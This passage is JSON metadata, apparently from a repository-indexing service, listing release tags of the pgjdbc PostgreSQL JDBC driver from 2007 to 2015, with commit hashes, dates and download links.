9_4_1201","sha":"a4f8c9ecfe0cf8f162f49bdfd8db5ff0baedb233","kind":"commit","published_at":"2015-02-25T16:00:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1201","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1201","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1201","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1201/manifests"},{"name":"REL9_4_1200","sha":"77ab3f6c92e931bc44ed97248ab367a4c798b687","kind":"tag","published_at":"2015-01-28T12:36:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_4_1200","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_4_1200","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_4_1200","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_4_1200/manifests"},{"name":"REL9_3_1103","sha":"ed37012bb880dde1c2a8b2949dfa47bbad6d7c37","kind":"commit","published_at":"2015-01-02T20:04:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1103","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1103","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1103","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1103/manifests"},{"name":"REL9_3_1102","sha":"820d560ff5ade8cd63083339d23b655ba5def6a7","kind":"tag","published_at":"2014-07-10T20:55:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1102","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1102","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1102","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1102/manifests"},{"name":"REL9_3_1101","sha":"f2d036adbea166e9a6574b6ee430e81dcd6d5f7e","kind":"commit","published_at":"2014-02-18T13:50:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1101","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1101","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1101","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1101/manifests"},{"name":"REL9_2_1004","sha":"38152acc7b38c74476d9f85f21216c586ada7988","kind":"tag","published_at":"2013-10-31T14:04:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1004","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1004","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1004","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1004/manifests"},{"name":"REL9_3_1100","sha":"09eb20272c825cac351ba4bb8c251ed7bb5dd5d3","kind":"tag","published_at":"2013-10-31T14:02:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_3_1100","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_3_1100","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_3_1100","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_3_1100/manifests"},{"name":"REL9_2_1003","sha":"947d5ab59c3bdfb43468ee5251aef1c73e91c9fd","kind":"tag","published_at":"2013-06-06T13:43:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1003","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1003","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1003","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1003/manifests"},{"name":"REL9_2_1001","sha":"1cd438695dc35cf4c1453e5d225f698c28d7389e","kind":"tag","published_at":"2012-11-14T21:54:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1001","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1001","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1001","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1001/manifests"},{"name":"REL9_2_1002","sha":"f9c2e98d9c80abb2b04690c8bc0c16f11a797c79","kind":"tag","published_at":"2012-11-14T21:29:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_2_1002","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_2_1002","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_2_1002","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_2_1002/manifests"},{"name":"REL9_1_903","sha":"3fdf1a0f4f533a1bdf59e7e0f3e5e49656d30d5b","kind":"commit","published_at":"2012-09-27T14:08:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_903","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_903","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_903","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_903/manifests"},{"name":"list","sha":"1f0403ea22970855e6a4f3164180ac7077cfebdf","kind":"commit","published_at":"2012-05-02T18:12:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/list","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/list","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@list","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/list/manifests"},{"name":"REL9_1_902","sha":"557d6f329197b293b2220fb7ebf0be3709c06f88","kind":"commit","published_at":"2012-04-26T01:42:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_902","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_902","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_902","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_902/manifests"},{"name":"REL9_1_901","sha":"928f33efecaf0c541b95e3c9e8404f7ba617d0eb","kind":"commit","published_at":"2011-09-11T01:38:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_1_901","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_1_901","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_1_901","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_1_901/manifests"},{"name":"REL9_0_802","sha":"6b3a04fc10e71ff4affd6624a53d24b3fad20999","kind":"commit","published_at":"2011-09-11T01:18:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_802","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_802","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_802","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_802/manifests"},{"name":"REL8_4_703","sha":"8f4050a1ec42b9db646193381db2a3e6bb981c75","kind":"commit","published_at":"2011-09-11T01:17:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_703","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_703","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_703","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_703/manifests"},{"name":"REL8_3_607","sha":"87173901b381a34c0010b3b4d45223c40ef1c76f","kind":"commit","published_at":"2011-09-11T01:14:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_607","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_607","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_607","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_607/manifests"},{"name":"REL8_2_512","sha":"2765d2fe73dcab4016950ec63857e530087464d1","kind":"commit","published_at":"2011-09-10T04:24:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_512","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_512","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_512","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_512/manifests"},{"name":"REL9_0_801","sha":"2e39cc38ddc3ba8028f0acd45bad69dc4d3d691b","kind":"commit","published_at":"2010-09-20T21:32:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL9_0_801","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL9_0_801","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL9_0_801","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL9_0_801/manifests"},{"name":"REL8_0_325","sha":"f7842c2feb40e7e7549f2ed54fb3df1cd4ef7386","kind":"commit","published_at":"2010-05-12T06:41:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_325","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_325","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_325","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_325/manifests"},{"name":"REL8_1_415","sha":"1219f0e80e5662997d460cb28148577c71e00432","kind":"commit","published_at":"2010-05-12T06:40:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_415","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_415","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_415","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_415/manifests"},{"name":"REL8_2_511","sha":"f597791a65c8c277c7cdb2a92709637352b1fde7","kind":"commit","published_at":"2010-05-12T06:40:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_511","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_511","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_511","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_511/manifests"},{"name":"REL8_3_606","sha":"5e1cb768622fcf53818de0318004166d1c942587","kind":"commit","published_at":"2010-05-12T06:39:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_606","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_606","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_606","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_606/manifests"},{"name":"REL8_4_702","sha":"034baa3e624ac87b11111480d1b4e35a2583a854","kind":"commit","published_at":"2010-05-12T06:36:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_702","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_702","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_702","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_702/manifests"},{"name":"REL8_0_324","sha":"a69999ff3b80ceb3777817d08496468edc725765","kind":"commit","published_at":"2009-07-01T05:16:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_324","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_324","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_324","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_324/manifests"},{"name":"REL8_1_414","sha":"ca013de95da92dadb9fafc940029fe15757ae2af","kind":"commit","published_at":"2009-07-01T05:16:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_414","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_414","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_414","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_414/manifests"},{"name":"REL8_2_510","sha":"a722ade8395fb287471001e0246f190a2b859552","kind":"commit","published_at":"2009-07-01T05:16:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_510","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_510","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_510","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_510/manifests"},{"name":"REL8_3_605","sha":"577936d8d7f7e9a1b6c7d725a96513a9b19498e3","kind":"commit","published_at":"2009-07-01T05:16:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_605","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_605","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_605","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_605/manifests"},{"name":"REL8_4_701","sha":"05af6314b92554e30034d49426b941ce621f9dee","kind":"commit","published_at":"2009-07-01T05:15:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_4_701","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_4_701","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_4_701","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_4_701/manifests"},{"name":"REL8_0_323","sha":"f2873cda04abcfb05695501c88dbee6bcd41d046","kind":"commit","published_at":"2008-11-16T13:46:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_323","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_323","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_323","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_323/manifests"},{"name":"REL8_1_413","sha":"2eb09ad9c7b2fddc88b4a87598f3734d4d2b433e","kind":"commit","published_at":"2008-11-16T13:45:57.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_413","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_413","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_413","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_413/manifests"},{"name":"REL8_2_509","sha":"3b35c0939abce6f600d19312c644475db6d0d4bd","kind":"commit","published_at":"2008-11-16T13:45:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_509","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_509","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_509","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_509/manifests"},{"name":"REL8_3_604","sha":"f8e3280f3cee126b0ad765fbdac92b40b784d469","kind":"commit","published_at":"2008-11-16T13:45:43.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_604","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_604","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_604","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_604/manifests"},{"name":"REL8_0_322","sha":"b3bc99ec992aa793817539a726416ed8c8df38cc","kind":"commit","published_at":"2008-01-31T09:55:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_322","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_322","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_322","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_322/manifests"},{"name":"REL8_1_412","sha":"c29d8b99429462a17d7ba0b8e8f6daedab92e80e","kind":"commit","published_at":"2008-01-31T09:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_412","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_412","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_412","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_412/manifests"},{"name":"REL8_2_508","sha":"2566771421d25f8b674a932e182e671504ce0480","kind":"commit","published_at":"2008-01-31T09:55:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_508","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_508","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_508","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_508/manifests"},{"name":"REL8_3_603","sha":"8a2eef81e45d07130e2d86bc8a18cc14642e2741","kind":"commit","published_at":"2008-01-31T09:54:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_3_603","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_3_603","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_3_603","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_3_603/manifests"},{"name":"REL8_0_321","sha":"4d7ea8b0061ef946705cbd46ee70cb5984f3a5e7","kind":"commit","published_at":"2007-12-02T08:31:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_321","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_321","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_321","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_321/manifests"},{"name":"REL8_1_411","sha":"4f487c433534b25222a81f7e80394ef3d52d72fe","kind":"commit","published_at":"2007-12-02T08:30:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_411","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_411","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_411","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_411/manifests"},{"name":"REL8_2_507","sha":"9f13dae31b5fdf75abd1552ec590749bf09e052d","kind":"commit","published_at":"2007-12-02T08:30:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_507","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_507","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_507","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_507/manifests"},{"name":"REL8_0_320","sha":"a72e305c0133dd8b962ab06cb991b44927317dd9","kind":"commit","published_at":"2007-07-31T06:07:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_320","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_320","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_320","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_320/manifests"},{"name":"REL8_1_410","sha":"5619f9ef751da6bfa6b619cf62716bb315f7eba8","kind":"commit","published_at":"2007-07-31T06:06:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_410","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_410","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_410","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_410/manifests"},{"name":"REL8_2_506","sha":"12eceb1ff7a04d25bf74bda80a59f37ac53110a3","kind":"commit","published_at":"2007-07-31T06:06:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_506","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_506","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_506","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8